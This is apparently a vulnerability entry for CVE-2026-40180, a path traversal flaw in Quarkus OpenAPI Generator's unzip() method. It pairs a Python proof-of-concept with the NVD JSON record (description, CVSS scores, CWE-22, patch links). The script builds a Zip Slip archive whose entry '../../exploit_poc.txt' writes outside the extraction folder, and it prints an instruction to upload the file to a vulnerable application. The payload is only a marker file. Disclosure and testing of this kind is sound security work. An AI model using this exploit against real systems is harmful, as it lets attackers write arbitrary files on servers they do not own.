CVE-2026-40180

import zipfile import os def create_malicious_zip(): """ Proof of Concept for CVE-2026-40180. Generates a malicious ZIP file containing a path traversal entry. """ zip_filename = "malicious_cve_2026_40180.zip" # The payload to write outside the intended directory payload_content = b"MALICIOUS_PAYLOAD: If you see this file outside the extraction folder, the system is vulnerable." try: with zipfile.ZipFile(zip_filename, 'w') as zf: # Construct a filename with path traversal sequences (Zip Slip) # This attempts to write to the parent directory of the extraction point malicious_filename = "../../exploit_poc.txt" # Create ZipInfo to set metadata (optional, but good practice) zinfo = zipfile.ZipInfo(malicious_filename) # Write the payload zf.writestr(zinfo, payload_content) print(f"[+] Successfully created malicious ZIP file: {zip_filename}") print(f"[+] The file contains an entry named: {malicious_filename}") print(f"[+] Upload or trigger the processing of this file on the vulnerable Quarkus application.") except Exception as e: print(f"[-] Error creating ZIP file: {e}") if __name__ == "__main__": create_malicious_zip()

{"cve": {"id": "CVE-2026-40180", "sourceIdentifier": "[email protected]", "published": "2026-04-10T20:16:23.260", "lastModified": "2026-05-21T19:09:58.943", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Quarkus OpenAPI Generator is Quarkus' extensions for generation of Rest Clients and server stubs generation. Prior to 2.16.0 and 2.15.0-lts, the unzip() method in ApicurioCodegenWrapper.java extracts ZIP entries without validating that the resolved file path stays within the intended output directory. At line 101, the destination is constructed as new File(toOutputDir, entry.getName()) and the content is written immediately. A malicious ZIP archive containing entries with path traversal sequences (e.g., ../../malicious.java) would write files outside the target directory. This vulnerability is fixed in 2.16.0 and 2.15.0-lts."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:quarkiverse:quarkus_openapi_generator:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.15.0", "matchCriteriaId": "E2C5131E-CD16-4C82-9C0A-D550F0860575"}, {"vulnerable": true, "criteria": "cpe:2.3:a:quarkiverse:quarkus_openapi_generator:2.15.0:*:*:*:-:*:*:*", "matchCriteriaId": "4E2B1037-3246-411E-BCF7-E800A6E3DDDD"}]}]}], "references": [{"url": "https://github.com/quarkiverse/quarkus-openapi-generator/commit/08b406414ff30ed192e86c7fa924e57565534ff0", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/quarkiverse/quarkus-openapi-generator/commit/e2a9c629a3df719abc74569a3795c265fd0e1239", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/quarkiverse/quarkus-openapi-generator/security/advisories/GHSA-jx2w-vp7f-456q", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/quarkiverse/quarkus-openapi-generator/security/advisories/GHSA-jx2w-vp7f-456q", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}